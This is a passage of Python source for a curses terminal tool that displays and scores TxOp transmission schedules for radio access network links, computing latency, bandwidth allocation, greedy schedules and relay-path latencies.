id_attr\n self.src = src\n self.src_id = src_id\n self.src_group = src_group\n self.dst = dst\n self.dst_id = dst_id\n self.tx_sched = []\n self.qos_policy = qp\n self.max_latency_usec = lat # Maximum Possible Latency achievable\n self.tx_dur_per_epoch_usec = 0\n self.alloc_bw_mbps = 0\n self.latency_point_value = 0\n self.throughput_point_value = 0\n self.greedy_tx_dur_per_epoch_usec = 0\n self.greedy_alloc_bw_mbps = 0\n self.greedy_throughput_point_value = 0\n\n def add_txop(self, txop):\n self.tx_sched.append(txop)\n self.tx_dur_per_epoch_usec += txop.duration_usec\n\n def calc_max_latency(self, epoch_usec):\n # initialize max_latency_usec with wrap-around TxOps\n if len(self.tx_sched) > 0:\n self.max_latency_usec = (int(epoch_usec) - (int(self.tx_sched[-1].stop_usec) + 1)) + \\\n int(self.tx_sched[0].start_usec)\n else:\n self.max_latency_usec = 0\n \n # iterate through the Link's TxOp Schedule, and compare latencies between TxOps with the previous max latency\n for i in range(len(self.tx_sched) - 1):\n temp_latency = int(self.tx_sched[i+1].start_usec) - (int(self.tx_sched[i].stop_usec) + 1)\n if temp_latency > self.max_latency_usec:\n self.max_latency_usec = temp_latency\n\n def calc_alloc_bw_mbps(self, epoch_ms):\n self.alloc_bw_mbps = ((int(self.tx_dur_per_epoch_usec) * (1000 / int(epoch_ms))) / 1000000) * MAX_BW_MBPS\n\n def calc_latency_value(self, max_points_thd_ms, min_points_thd_ms, multiplier):\n if self.max_latency_usec < int(max_points_thd_ms*1000):\n self.latency_point_value = 100\n elif self.max_latency_usec < int(min_points_thd_ms*1000):\n ans = 100 - (self.max_latency_usec - int(max_points_thd_ms*1000)) ** 2\n if ans > 0:\n self.latency_point_value = ans\n else:\n self.latency_point_value = 0\n else:\n self.latency_point_value = 0\n self.latency_point_value = self.latency_point_value * multiplier\n\n def calc_throughput_value(self, min_points_thd, max_points_thd, coef, multiplier):\n alloc_bw_kbps = self.alloc_bw_mbps * 1000\n if alloc_bw_kbps < min_points_thd:\n self.throughput_point_value = 0.0\n elif alloc_bw_kbps < max_points_thd:\n self.throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * alloc_bw_kbps)))\n else:\n self.throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * max_points_thd)))\n self.throughput_point_value = self.throughput_point_value * multiplier\n\n def calc_greedy_alloc_bw_mbps(self, epoch_ms):\n self.greedy_alloc_bw_mbps = ((int(self.greedy_tx_dur_per_epoch_usec) * (1000 / int(epoch_ms))) / 1000000) * MAX_BW_MBPS\n\n def calc_greedy_throughput_value(self, min_points_thd, max_points_thd, coef, multiplier):\n alloc_bw_kbps = self.greedy_alloc_bw_mbps * 1000\n if alloc_bw_kbps < min_points_thd:\n self.greedy_throughput_point_value = 0.0\n elif alloc_bw_kbps < max_points_thd:\n self.greedy_throughput_point_value = (100 - 100 * (math.e ** ((-1 * coef) * alloc_bw_kbps)))\n else:\n self.greedy_throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * max_points_thd)))\n self.greedy_throughput_point_value = self.greedy_throughput_point_value * multiplier\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\nclass TmNSRadio:\n \"\"\"Class to contain TmNSRadio\"\"\"\n def __init__(self, id, name, rfmacaddress, listeningport, incoming_group_id):\n self.id = id\n self.name = name\n self.incoming = listeningport\n self.outgoing = rfmacaddress\n self.incoming_group_id = incoming_group_id\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\ndef print_banner():\n global stdscr\n global banner_pad\n global text_d\n global border_d\n\n height, width = stdscr.getmaxyx()\n pad_height, pad_width = banner_pad.getmaxyx()\n\n horizon = border_d['TS'] * (pad_width - 2)\n banner_pad.addstr(0, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']), text_d['BORDER'])\n banner_pad.addstr(1, 0, \"{0}{1}{2}\".format(border_d['LS'],\n \" TxOp Schedule Viewer for Link Manager \"\n \"Algorithm Evaluator \",\n border_d['RS']), text_d['BORDER'])\n banner_pad.addstr(2, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']), text_d['BORDER'])\n banner_pad.noutrefresh(0, 0, 0, 0, 3, width - 1)\n \n \n# ------------------------------------------------------------------------------\n\n\ndef print_file_info(f, name, config, s_file):\n global stdscr\n global file_info_pad\n global text_d\n\n height, width = stdscr.getmaxyx()\n \n msg1 = \"MDL File: {}\".format(f)\n msg2 = \"Name: {}\".format(name)\n msg3 = \"Configuration Version: {}\".format(config)\n msg4 = \"Score Criteria: {}\".format(s_file)\n file_info_pad.addstr(0, 0, \"{0:^102}\".format(msg1), text_d['BG'] | BOLD)\n file_info_pad.addstr(1, 0, \"{0:^102}\".format(msg2), text_d['BG'] | BOLD)\n file_info_pad.addstr(2, 0, \"{0:^102}\".format(msg3), text_d['BG'] | BOLD)\n if s_file is None:\n file_info_pad.addstr(3, 0, \"{0:>102}\".format('Not for score'),\n text_d['ERROR_BLACK'] | BOLD | curses.A_UNDERLINE)\n elif os.path.isfile(s_file):\n file_info_pad.addstr(3, 0, \"{0:>102}\".format(msg4), text_d['FOR_SCORE'] | BOLD | curses.A_UNDERLINE)\n else:\n file_info_pad.addstr(3, 0, \"{0:>102}\".format('Score File Not Found: {0}'.format(s_file)),\n text_d['ERROR_BLACK'] | BOLD | curses.A_UNDERLINE)\n \n if (height-1) >= 9:\n file_info_pad.noutrefresh(0, 0, 4, 2, 7, (width-1))\n else:\n file_info_pad.noutrefresh(0, 0, 4, 2, (height-2), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_ran_stats(ran):\n global stdscr\n global ran_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n ran_pad.addstr(0, 0, \" RAN Configuration Name:..... {0:70}\".format(ran.name),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(1, 0, \" Center Frequency:........... {0} MHz{1:60}\".format(int(ran.freq)/1000000, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(2, 0, \" Epoch Size:................. {0} ms{1:64}\".format(ran.epoch_ms, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(3, 0, \" Guard Time:................. {0:0.3f} ms{1:62}\".format(ran.guard_ms, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n \n start_row_pos = 9\n last_row_pos = 12\n \n if (height-1) >= last_row_pos:\n ran_pad.noutrefresh(0, 0, start_row_pos, 2, last_row_pos, (width-1))\n elif (height-1) >= start_row_pos:\n ran_pad.noutrefresh(0, 0, start_row_pos, 2, (height-1), (width-1))\n \n\n# ------------------------------------------------------------------------------\n\n\ndef print_links_info(links, num_rans):\n global stdscr\n global link_info_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n rows_needed = 1\n for l in links:\n if len(l.tx_sched) == 0:\n rows_needed += 4 + 1\n else:\n rows_needed += 4 + len(l.tx_sched)\n \n link_info_pad = curses.newpad(rows_needed, 102)\n link_info_pad.bkgd(text_d['BG'])\n \n link_info_pad.addstr(0, 0, \"{0:^102}\".format(\"RAN DETAILS\"), text_d['BG'] | curses.A_UNDERLINE)\n link_info_pad.addstr(0, 96, \"SCORE\", text_d['BG'] | curses.A_UNDERLINE)\n \n start_row = 1\n for idx, link in enumerate(links, start=0):\n print_link_info(link, start_row, idx)\n if len(link.tx_sched) > 0:\n start_row += 4 + len(link.tx_sched)\n else:\n start_row += 4 + 1\n \n start_row_num = 16 + (5 * num_rans)\n last_row_num = start_row_num + rows_needed\n \n if (height-1) >= last_row_num:\n link_info_pad.noutrefresh(0, 0, start_row_num, 2, last_row_num, (width-1))\n elif (height-1) >= start_row_num:\n link_info_pad.noutrefresh(0, 0, start_row_num, 2, (height-1), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_link_info(link, row, cp):\n global link_info_pad\n global mod_name\n global score_file\n\n txt_color = curses.color_pair((cp % 10) + 1)\n\n link_info_pad.addstr(row, 0, \"Link: {}\".format(link.name), txt_color | BOLD)\n link_info_pad.addstr(row+1, 0, \"Source Radio RF MAC Addr: {0:5d} [0x{0:04x}] \".format(int(link.src)),\n txt_color | BOLD)\n link_info_pad.addstr(row+2, 0, \"Destination Group RF MAC Addr: {0:5d} [0x{0:04x}] \".format(int(link.dst)),\n txt_color | BOLD)\n link_info_pad.addstr(row+1, 56, \"Max Latency Requirement: \", txt_color)\n link_info_pad.addstr(row+2, 56, \"Max Latency Achievable: \", txt_color | curses.A_UNDERLINE)\n link_info_pad.addstr(row+3, 56, \"Minimum Capacity Required: \", txt_color)\n link_info_pad.addstr(row+4, 56, \"Allocated Bandwidth: \", txt_color)\n\n scored_link = False\n if score_file is not None and ld_link_scores is not None:\n for score in ld_link_scores:\n if \"Link\" in score:\n # If Scoring Source and destination are on the same link.\n if (int(link.src) == int(score['Link']['LinkSrc'])) and (int(link.dst) == int(score['Link']['LinkDst'])):\n scored_link = True\n score_data = score\n break\n\n if not scored_link:\n link_info_pad.addstr(row+1, 84, \"No Entry in {}!\".format(score_file),\n txt_color | BOLD | curses.A_REVERSE)\n if link.max_latency_usec == 0:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'), txt_color | curses.A_UNDERLINE)\n else:\n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE)\n \n else:\n if int(score_data[\"Latency\"][\"max_thd\"]) == 1000000.0:\n link_info_pad.addstr(row+1, 84, \"N/A\", txt_color)\n else:\n link_info_pad.addstr(row+1, 84, \"{0:.3f} ms\".format(int(score_data[\"Latency\"][\"max_thd\"])),\n txt_color)\n \n if link.max_latency_usec == 0:\n if score_data[\"Latency\"][\"max_thd\"] < 1000000.0:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'),\n txt_color | curses.A_UNDERLINE | curses.A_REVERSE)\n else:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'),\n txt_color | curses.A_UNDERLINE)\n elif link.max_latency_usec < score_data[\"Latency\"][\"max_thd\"]:\n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE)\n else: \n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE | curses.A_REVERSE)\n \n if not scored_link:\n link_info_pad.addstr(row+3, 84, \"No Entry in {}!\".format(score_file), txt_color |\n BOLD | curses.A_REVERSE)\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color)\n else:\n qp_ac_mbps = int(score_data[\"Bandwidth\"][\"min_thd\"]) / 1000 # get QoS Policy rate in Mbps\n link_info_pad.addstr(row+3, 84, \"{0:0.3f} Mbps\".format(qp_ac_mbps), txt_color)\n \n if qp_ac_mbps <= link.alloc_bw_mbps:\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color)\n else:\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color | curses.A_REVERSE)\n\n link_info_pad.addstr(row + 2, 96, \"{0:0.1f}\".format(link.latency_point_value),\n txt_color | curses.A_UNDERLINE | BOLD)\n link_info_pad.addstr(row + 4, 96, \"{0:0.1f}\".format(link.throughput_point_value),\n txt_color | curses.A_UNDERLINE | BOLD)\n\n if (len(link.tx_sched)) > 0:\n print_txops_info(link.tx_sched, row+3, cp)\n else:\n link_info_pad.addstr(row+3, 2, \" NO TXOPS DEFINED IN MDL FOR THIS LINK \",\n txt_color | curses.A_REVERSE | BOLD)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_info(txops, row, cp):\n global link_info_pad\n \n for idx, txop in enumerate(txops, start=0):\n print_txop_info(txop, idx, row+idx, cp)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txop_info(txop, idx, row, cp):\n global link_info_pad\n\n txt_color = curses.color_pair((cp % 10) + 1)\n txop_str = \" TxOp {0}: {1:6d} - {2:6d} us (TTL: {3:3d}) @ {4} MHz \\r\".format(\n idx+1, int(txop.start_usec), int(txop.stop_usec), int(txop.timeout), \n int(txop.freq)/1000000)\n\n link_info_pad.addstr(row, 0, txop_str, txt_color)\n \n if debug >= 2:\n print(\" TxOp {0}: {1:6d} - {2:6d} us (TTL: {3:3d}) @ {4} MHz\\r\".format(\n idx+1, int(txop.start_usec), int(txop.stop_usec), int(txop.timeout), \n int(txop.freq)/1000000))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_in_all_rans(rans, sel):\n global stdscr\n global epoch_pad\n global txop_display_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n rows_needed = (len(rans) * 5)\n epoch_pad = curses.newpad(rows_needed, 102)\n epoch_pad.bkgd(text_d['BG'])\n\n start_row_num = 15\n last_row_num = start_row_num + rows_needed\n \n for idx, ran in enumerate(rans, start=0):\n print_txops_in_epoch(ran, idx, sel)\n\n if (height-1) >= last_row_num:\n epoch_pad.noutrefresh(0, 0, start_row_num, 2, last_row_num, (width-1))\n elif (height-1) >= start_row_num:\n epoch_pad.noutrefresh(0, 0, start_row_num, 2, (height-1), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_in_epoch(ran, ran_num, sel):\n global stdscr\n global epoch_pad\n global txop_display_pad\n global text_d\n \n epoch_ms = ran.epoch_ms\n links = ran.links\n\n start_row_num = (ran_num * 5)\n bar = (int(epoch_ms))/100\n scale_str = \"one bar = {} ms\".format(bar)\n horizon = border_d['TS'] * 100\n \n if ran_num == sel:\n epoch_pad.addstr(start_row_num, 0, \"{0:>102}\".format(scale_str), text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num, 0, \"{0}.) {1}\\t|\\tBW Efficiency: {2:5.2f}%\".\n format((ran_num+1), ran.name, ran.efficiency_pct), text_d['BG'] | curses.A_REVERSE |\n BOLD)\n epoch_pad.addstr(start_row_num, 51, '|'.format(\" \"), text_d['BG'] | curses.A_REVERSE | BOLD)\n epoch_pad.addstr(start_row_num, 54, 'Guardbands:', text_d['BG'] | curses.A_REVERSE | BOLD)\n\n if ran.gb_violated is False:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"OK\"), text_d['PASS_WHITE'] | BOLD)\n else:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"VIOLATION\"), text_d['ERROR_WHITE'] | BOLD | BLINK)\n\n epoch_pad.addstr(start_row_num + 1, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']),\n text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num + 2, 0, '{0}{1:100}{2}'.format(border_d['LS'], \" \", border_d['RS']),\n text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num + 3, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']),\n text_d['BG'] | curses.A_REVERSE)\n else:\n epoch_pad.addstr(start_row_num, 0, \"{0:>102}\".format(scale_str), text_d['BG'])\n epoch_pad.addstr(start_row_num, 0, \"{0}.) {1}\\t|\\tBW Efficiency: {2:5.2f}%\".\n format((ran_num+1), ran.name, ran.efficiency_pct), text_d['BG'] | BOLD)\n epoch_pad.addstr(start_row_num, 51, '|'.format(\" \"), text_d['BG'] | BOLD)\n epoch_pad.addstr(start_row_num, 54, '{}'.format(\"Guardbands:\"), text_d['BG'] | BOLD)\n\n if ran.gb_violated is False:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"OK\"), text_d['PASS_BLACK'] | BOLD)\n else:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"VIOLATION\"), text_d['ERROR_BLACK'] | BOLD | BLINK)\n\n epoch_pad.addstr(start_row_num + 1, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']),\n text_d['BG'])\n epoch_pad.addstr(start_row_num + 2, 0, '{0}{1:100}{2}'.format(border_d['LS'], \" \", border_d['RS']),\n text_d['BG'])\n epoch_pad.addstr(start_row_num + 3, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']),\n text_d['BG'])\n \n for idx, link in enumerate(links, start=0):\n for txop in link.tx_sched:\n need_half_block_right = False\n need_half_block_left = False\n start_pos = (int(txop.start_usec) / 1000) / bar\n stop_pos = (int(txop.stop_usec) / 1000) / bar\n frac_start = 0\n frac_stop = 0\n \n if math.floor(start_pos) > 0:\n frac_start = start_pos % math.floor(start_pos)\n start_pos = math.floor(start_pos)\n if frac_start >= 0.75:\n start_pos += 1\n elif frac_start >= 0.25:\n need_half_block_right = True\n \n if math.floor(stop_pos) > 0:\n frac_stop = stop_pos % math.floor(stop_pos)\n stop_pos = math.floor(stop_pos)\n if frac_stop >= 0.75:\n stop_pos += 1\n elif frac_stop >= 0.25:\n need_half_block_left = True\n \n num_bars = stop_pos - start_pos\n if need_half_block_right and need_half_block_left:\n graphic = u'\\u2590' + u'\\u2588' * int(num_bars-1) + u'\\u258c'\n elif need_half_block_right:\n graphic = u'\\u2590' + u'\\u2588' * int(num_bars-1)\n elif need_half_block_left:\n graphic = u'\\u2588' * int(num_bars) + u'\\u258c'\n else:\n graphic = u'\\u2588' * int(num_bars)\n\n if ran_num == sel:\n epoch_pad.addstr(start_row_num+2, int(start_pos)+1, graphic, curses.color_pair((idx % 10) + 11))\n else:\n epoch_pad.addstr(start_row_num+2, int(start_pos)+1, graphic, curses.color_pair((idx % 10) + 1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_toolbar():\n global stdscr\n global toolbar_pad\n global text_d\n\n height, width = stdscr.getmaxyx()\n tp_height, tp_width = toolbar_pad.getmaxyx()\n\n select_msg = \"ENTER RAN # FOR DETAILS\"\n quit_msg = \"PRESS 'q' TO QUIT\"\n\n toolbar_pad.addstr(0, 0, \"{0}\".format(border_d['TS'] * (tp_width - 1)))\n toolbar_pad.addstr(1, 0, \" {0} | {1} \".format(select_msg, quit_msg), text_d['BORDER'])\n toolbar_pad.addstr(1, 34, 'q', text_d['BORDER'] | BOLD | curses.A_REVERSE)\n\n toolbar_pad.noutrefresh(0, 0, (height - 3), 0, (height - 1), (width - 1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_too_short(width):\n global stdscr\n global text_d\n \n bangs = '!' * int((width-49)/2)\n msg1 = bangs + ' DID YOU WANT TO SEE SOMETHING IN THIS WINDOW? ' + bangs\n msg2 = bangs + ' TRY MAKING THE WINDOW A LITTLE BIT DEEPER. ' + bangs\n msg3 = bangs + ' RESIZE WINDOW TO CONTINUE ' + bangs\n stdscr.addstr(0, 0, \"{0:^{1}}\".format(msg1, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(1, 0, \"{0:^{1}}\".format(msg2, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(2, 0, \"{0:^{1}}\".format(msg3, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_too_skinny(width):\n global stdscr\n global text_d\n \n bangs = '!' * int((width-34)/2)\n msg1 = bangs + ' NOT SURE WHAT YOU EXPECT TO ' + bangs\n msg2 = bangs + ' SEE ON SUCH A SKINNY SCREEN ' + bangs\n msg3 = bangs + ' TRY MAKING IT WIDER, OR RISK ' + bangs\n msg4 = bangs + ' SKYNET ' + bangs\n stdscr.addstr(0, 0, \"{0:^{1}}\".format(msg1, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(1, 0, \"{0:^{1}}\".format(msg2, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(2, 0, \"{0:^{1}}\".format(msg3, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(3, 0, \"{0:^{1}}\".format(msg4, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n \n\n# ------------------------------------------------------------------------------\n\n\ndef init_text_colors():\n global text_d\n global border_d\n\n # Color Pair Setup\n curses.init_pair(1, 114, 235) # greenish 1\n curses.init_pair(2, 152, 235) # bluish 1\n curses.init_pair(3, 182, 235) # purplish 1\n curses.init_pair(4, 210, 235) # redish 1\n curses.init_pair(5, 229, 235) # yellowish 1\n curses.init_pair(6, 42, 235) # greenish 2\n curses.init_pair(7, 37, 235) # bluish 2\n curses.init_pair(8, 135, 235) # purplish 2\n curses.init_pair(9, 175, 235) # redish 2\n curses.init_pair(10, 222, 235) # yellowish 2\n curses.init_pair(11, 114, 15) # greenish 1 on white\n curses.init_pair(12, 152, 15) # bluish 1 on white\n curses.init_pair(13, 182, 15) # purplish 1 on white\n curses.init_pair(14, 210, 15) # redish 1 on white\n curses.init_pair(15, 229, 15) # yellowish 1 on white\n curses.init_pair(16, 42, 15) # greenish 2 on white\n curses.init_pair(17, 37, 15) # bluish 2 on white\n curses.init_pair(18, 135, 15) # purplish 2 on white\n curses.init_pair(19, 175, 15) # redish 2 on white\n curses.init_pair(20, 222, 15) # yellowish 2 on white\n curses.init_pair(31, 12, 235) # Windows: MSG ERROR - redish\n curses.init_pair(32, 14, 235) # Windows: MSG WARNING - yellowish\n curses.init_pair(33, 8, 235) # Windows: MSG INFO - grayish\n curses.init_pair(34, 24, 235) # Windows: MSG UNKNOWN - bluish\n curses.init_pair(35, 47, 235) # Windows: Trend Up - greenish\n curses.init_pair(36, 24, 235) # Windows: Trend Steady - bluish\n curses.init_pair(37, 160, 235) # Windows: Trend Down - redish\n curses.init_pair(38, 14, 235) # Windows: Warning - Black\n curses.init_pair(39, 12, 15) # Windows: Error - White\n curses.init_pair(40, 12, 235) # Windows: Error - Black\n curses.init_pair(247, 63, 235) # border\n curses.init_pair(248, 11, 235)\n curses.init_pair(249, 27, 235)\n curses.init_pair(250, 10, 235)\n curses.init_pair(251, 10, 15)\n curses.init_pair(252, 10, 235)\n curses.init_pair(253, 9, 15)\n curses.init_pair(254, 9, 235)\n curses.init_pair(255, 15, 235)\n\n text_d['BORDER'] = curses.color_pair(247)\n text_d['WARNING_BLACK'] = curses.color_pair(248)\n text_d['BANNER'] = curses.color_pair(249)\n text_d['FOR_SCORE'] = curses.color_pair(250)\n text_d['PASS_WHITE'] = curses.color_pair(251)\n text_d['PASS_BLACK'] = curses.color_pair(252)\n text_d['ERROR_WHITE'] = curses.color_pair(253)\n text_d['ERROR_BLACK'] = curses.color_pair(254)\n text_d['BG'] = curses.color_pair(255)\n\n # If running on Windows, use the following terminal colors\n if os.name == 'nt':\n text_d['BORDER'] = curses.color_pair(247)\n text_d['WARNING_BLACK'] = curses.color_pair(38)\n text_d['BANNER'] = curses.color_pair(249)\n text_d['FOR_SCORE'] = curses.color_pair(250)\n text_d['PASS_WHITE'] = curses.color_pair(251)\n text_d['PASS_BLACK'] = curses.color_pair(252)\n text_d['ERROR_WHITE'] = curses.color_pair(39)\n text_d['ERROR_BLACK'] = curses.color_pair(40)\n text_d['BG'] = curses.color_pair(255)\n\n border_d['LS'] = u'\\u2502'\n border_d['RS'] = u'\\u2502'\n border_d['TS'] = u'\\u2500'\n border_d['BS'] = u'\\u2500'\n border_d['TL'] = u'\\u250c'\n border_d['TR'] = u'\\u2510'\n border_d['BL'] = u'\\u2514'\n border_d['BR'] = u'\\u2518'\n\n\n# ------------------------------------------------------------------------------\n\ndef generated_sorted_list(rans_list, link_scores):\n scored_links = []\n\n if link_scores is not None:\n for ran in rans_list:\n greedy_ran = {\"Epoch\": int(ran.epoch_ms)/1000, \"Guard_Band\": ran.guard_ms/1000, \"Links\": []} # s, s\n for l in ran.links:\n link_data = {}\n for d in link_scores:\n if \"Link\" in d:\n if (int(l.src) == int(d['Link']['LinkSrc'])) and (int(l.dst) == int(d['Link']['LinkDst'])):\n link_data = {\"Link\": l}\n bandwidth = {}\n latency = {}\n bandwidth['bw_min_thd'] = 0\n bandwidth['bw_max_thd'] = 0\n bandwidth['bw_coef'] = 0\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n latency['lat_max_thd'] = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n latency['lat_min_thd'] = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bandwidth['bw_min_thd'] = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bandwidth['bw_max_thd'] = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bandwidth['bw_coef'] = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n\n link_data[\"Bandwith_Data\"] = bandwidth\n link_data[\"Latency_Data\"] = latency\n greedy_ran[\"Links\"].append(link_data)\n else:\n if debug >= 1:\n print(\"No match of SRC and DST: this link is {0} --> {1}\\r\".format(l.src, l.dst))\n else:\n if debug >= 1:\n print(\"No match for key 'Link' in score file for link.\\r\")\n if greedy_ran[\"Links\"]:\n scored_links.append(greedy_ran)\n\n for ran in scored_links:\n ran[\"Links\"] = sorted(ran[\"Links\"], key=lambda x: x[\"Bandwith_Data\"][\"bw_coef\"], reverse=True)\n\n return scored_links\n\n\ndef min_required_schedule(rans_list, link_scores):\n sorted_rans = generated_sorted_list(rans_list, link_scores)\n\n\ndef max_requested_schedule(rans_list, link_scores, mult):\n bandwidth = MAX_BW_MBPS * 1000 # kb/s\n sorted_rans = generated_sorted_list(rans_list, link_scores)\n for ran in sorted_rans:\n gb = ran[\"Guard_Band\"] # s\n epoch = ran[\"Epoch\"] # s\n epoch_ms = epoch * 1000\n uepoch = epoch * 1000000 # us\n ugb = gb * 1000000\n links = ran[\"Links\"]\n epoch_remaining = uepoch # us\n for link_data in links:\n link = link_data[\"Link\"]\n bw_data = link_data[\"Bandwith_Data\"]\n lat_data = link_data[\"Latency_Data\"]\n min_point_threshold = bw_data['bw_min_thd'] # s\n min_point_threshold_time = min_point_threshold / bandwidth # s\n mix_point_threshold_time_per_epoch = min_point_threshold_time * uepoch # us\n max_point_threshold = bw_data['bw_max_thd'] # s\n max_point_threshold_time = max_point_threshold / bandwidth # s\n max_point_threshold_time_per_epoch = max_point_threshold_time * uepoch # us\n coef = bw_data['bw_coef']\n latency = lat_data[\"lat_min_thd\"] / 1000 # us\n guard_band_count = math.ceil(max_point_threshold_time / latency) # s/s\n total_gb_time = guard_band_count * ugb # s\n bw_consumed = max_point_threshold_time_per_epoch+total_gb_time\n if epoch_remaining > bw_consumed:\n link.greedy_tx_dur_per_epoch_usec = max_point_threshold_time_per_epoch\n link.calc_greedy_alloc_bw_mbps(epoch_ms)\n link.calc_greedy_throughput_value(min_point_threshold, max_point_threshold, coef, mult)\n epoch_remaining = epoch_remaining - bw_consumed\n\n\n# ------------------------------------------------------------------------------\n\n\ndef write_report_to_json(rans_list):\n new_rans_list = copy.deepcopy(rans_list)\n ran_config_dict = {}\n for ran in new_rans_list:\n ran_dict = vars(ran)\n links = []\n for l in ran.links:\n link_dict = vars(l)\n toxp_list = []\n for t in l.tx_sched:\n toxp_list.append(vars(t))\n link_dict['tx_sched'] = toxp_list\n if link_dict['qos_policy'] is not None:\n link_dict['qos_policy'] = vars(l.qos_policy)\n links.append(link_dict)\n ran_dict['links'] = links\n ran_config_dict[ran.name] = ran_dict\n\n cwd = os.getcwd()\n log_file_name = 'TxOpSched_Report_{}.json'\n log_dir_name = 'TxOpSched_Logs'\n log_dir = os.path.join(cwd, log_dir_name)\n log_file = os.path.join(log_dir, log_file_name)\n\n if not os.path.isdir(log_dir):\n os.mkdir(log_dir)\n\n with open(log_file.format(now), 'w') as f:\n json.dump(ran_config_dict, f, indent=4, sort_keys=True)\n\n# ------------------------------------------------------------------------------\n\n\ndef find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path):\n # Change to use IDs instead of ports\n previous_links = []\n previous_groups = []\n for link in relay_path:\n previous_links.append(link)\n previous_groups.append(link.src_group)\n\n for radio in tmnsradio_list:\n if radio.incoming_group_id == initial_dest:\n new_src = radio.id\n break\n\n for link in ran.links:\n if link.src_id == new_src:\n if link.dst_id not in previous_groups:\n new_dest = link.dst_id\n if link in previous_links or link.src_group in previous_groups:\n pass\n else:\n relay_path.append(link)\n previous_links.append(link)\n if link.dst == target_dest:\n break\n find_next_step_in_relay(ran, new_dest, target_dest, tmnsradio_list, relay_path)\n\n return relay_path\n\n\ndef generate_relay_path(ran, initial_dest, target_dest, tmnsradio_list, relay_path):\n relay_path = find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path)\n if relay_path[-1].dst != target_dest:\n relay_path = []\n return relay_path\n\n\ndef calculate_latency_relay(relay_path, epoch_us):\n source = relay_path[0]\n other_relays = relay_path[1:]\n max_latency = 0\n for initial_tx in source.tx_sched:\n epoch_count = 0\n epoch_lap = False\n initial_end_time = initial_tx.stop_usec\n previous_end_time = initial_end_time\n for relay in other_relays:\n relay_start_time = epoch_us\n relay_latency = epoch_us\n for tx in relay.tx_sched:\n if previous_end_time < tx.start_usec:\n current_start_time = tx.start_usec\n else:\n current_start_time = tx.start_usec + epoch_us\n current_latency = current_start_time - previous_end_time\n if current_latency < relay_latency:\n relay_latency = current_latency\n relay_start_time = tx.start_usec\n if current_start_time >= epoch_us:\n epoch_lap = True\n if current_start_time < epoch_us:\n epoch_lap = False\n if epoch_lap:\n epoch_count += 1\n latency = relay_start_time + (epoch_count * epoch_us) - initial_end_time\n if latency > max_latency:\n max_latency = latency\n return max_latency\n\n\ndef 